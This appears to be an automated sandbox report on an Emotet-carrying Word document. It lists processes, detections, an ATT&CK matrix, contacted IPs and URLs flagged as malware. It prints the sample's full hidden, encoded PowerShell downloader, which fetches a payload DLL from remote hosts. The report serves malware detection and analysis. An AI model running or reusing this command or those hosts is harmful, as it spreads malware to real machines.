AnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1090000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information21LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSecurity Software Discovery131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaPowerShell4Rc.commonRc.commonMasquerading21Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion3DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 347028 Sample: v22Pc0qA.doc.doc Startdate: 01/02/2021 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for dropped file 2->56 58 11 other signatures 2->58 9 cmd.exe 1 2->9         started        12 WINWORD.EXE 193 49 2->12         started        14 svchost.exe 1 2->14         started        16 2 other processes 2->16 process3 signatures4 62 Suspicious powershell command line found 9->62 64 Very long command line found 9->64 66 Encrypted powershell cmdline option found 9->66 68 PowerShell case anomaly found 9->68 18 powershell.exe 14 22 9->18         started        23 conhost.exe 9->23         started        25 msg.exe 1 9->25         started        process5 dnsIp6 44 isatechnology.com 35.208.182.43, 443, 49744 GOOGLE-2US United States 18->44 46 www.isatechnology.com 18->46 48 2 other IPs or domains 18->48 36 C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll, PE32 18->36 dropped 60 Powershell drops PE file 18->60 27 rundll32.exe 18->27         started        file7 signatures8 process9 process10 29 rundll32.exe 2 27->29         started        signatures11 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->70 32 rundll32.exe 12 29->32         started        process12 dnsIp13 38 50.116.111.59, 49773, 8080 UNIFIEDLAYER-AS-1US United States 32->38 40 173.249.20.233, 443, 49775 CONTABODE Germany 32->40 42 2 other IPs or domains 32->42 50 System process connects to network (likely due to code injection or exploit) 32->50 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                v22Pc0qA.doc.doc73%VirustotalBrowse
                v22Pc0qA.doc.doc47%MetadefenderBrowse
                v22Pc0qA.doc.doc86%ReversingLabsScript-Macro.Trojan.Valyria

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll100%Joe Sandbox ML
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll56%MetadefenderBrowse
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll96%ReversingLabsWin32.Trojan.Emotet

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                6.2.rundll32.exe.1090000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.2.rundll32.exe.f40000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                isatechnology.com7%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://isatechnology.com0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.30%Avira URL Cloudsafe
                https://physio-svdh.ch/angebot/physiotherapie/0%Avira URL Cloudsafe
                https://www.isatechnology.com/training/b/100%Avira URL Cloudmalware
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.00%Avira URL Cloudsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                http://transfersuvan.com/wp-admin/OVl/100%Avira URL Cloudmalware
                https://physio-svdh.ch/wp-content/themes/econature/js/jquer00%Avira URL Cloudsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://physio-svdh.ch/angebot/hausbesuche/0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.00%Avira URL Cloudsafe
                http://cps.root-x1.letsencrypt.0%Avira URL Cloudsafe
                https://physio-svdh.ch/kontakt/0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.30%Avira URL Cloudsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7c0%Avira URL Cloudsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://physio-svdh.ch/0%Avira URL Cloudsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch0%Avira URL Cloudsafe
                https://physio-svdh.ch/ueber-uns/about-us/0%Avira URL Cloudsafe
                http://arquivopop.com.br/index_htm_files/Kxh/100%Avira URL Cloudmalware
